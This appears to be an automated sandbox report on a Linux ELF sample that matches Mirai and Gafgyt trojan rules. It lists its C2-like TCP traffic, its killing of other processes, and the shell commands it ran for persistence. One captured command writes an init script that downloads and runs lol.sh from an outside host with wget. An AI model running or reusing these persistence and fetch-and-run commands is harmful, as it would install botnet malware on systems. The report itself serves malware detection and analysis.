Source: global traffic |
TCP traffic: 91.92.246.113 ports 38241,1,2,3,4,8 |
Source: global traffic |
TCP traffic: 93.123.85.166 ports 38241,1,2,3,4,8 |
Source: global traffic |
TCP traffic: 154.216.17.220 ports 38241,1,2,3,4,8 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: x86_32.nn.elf, 5461.1.00000000ffaf4000.00000000ffb15000.rw-.sdmp, x86_32.nn.elf.32.dr, profile.12.dr, inittab.12.dr, bootcmd.12.dr, mybinary.12.dr, custom.service.12.dr |
String found in binary or memory: http://pen.gorillafirewall.su/ |
Source: x86_32.nn.elf, 5461.1.00000000ffaf4000.00000000ffb15000.rw-.sdmp |
String found in binary or memory: http://pen.gorillafirewall.su/lol.sh |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown |
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown |
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown |
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown |
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown |
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown |
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown |
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown |
Source: /tmp/x86_32.nn.elf (PID: 5462) |
SIGKILL sent: pid: 792, result: successful |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5462) |
SIGKILL sent: pid: 884, result: successful |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5462) |
SIGKILL sent: pid: 1944, result: successful |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5462) |
SIGKILL sent: pid: 3181, result: successful |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5462) |
SIGKILL sent: pid: 3185, result: successful |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5462) |
SIGKILL sent: pid: 5469, result: successful |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5462) |
SIGKILL sent: pid: 5483, result: successful |
Jump to behavior |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16 |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16 |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16 |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16 |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26 |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26 |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26 |
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16 |
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16 |
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16 |
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16 |
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26 |
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26 |
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26 |
Source: /tmp/x86_32.nn.elf (PID: 5463) |
Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1" |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5468) |
Shell command executed: sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1" |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5473) |
Shell command executed: sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1" |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5475) |
Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/x86_32.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting x86_32.nn.elf'\n /tmp/x86_32.nn.elf &\n wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping x86_32.nn.elf'\n killall x86_32.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/x86_32.nn.elf" |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5476) |
Shell command executed: sh -c "chmod +x /etc/init.d/x86_32.nn.elf >/dev/null 2>&1" |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5478) |
Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1" |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 5480) |
Shell command executed: sh -c "ln -s /etc/init.d/x86_32.nn.elf /etc/rc.d/S99x86_32.nn.elf >/dev/null 2>&1" |
Jump to behavior |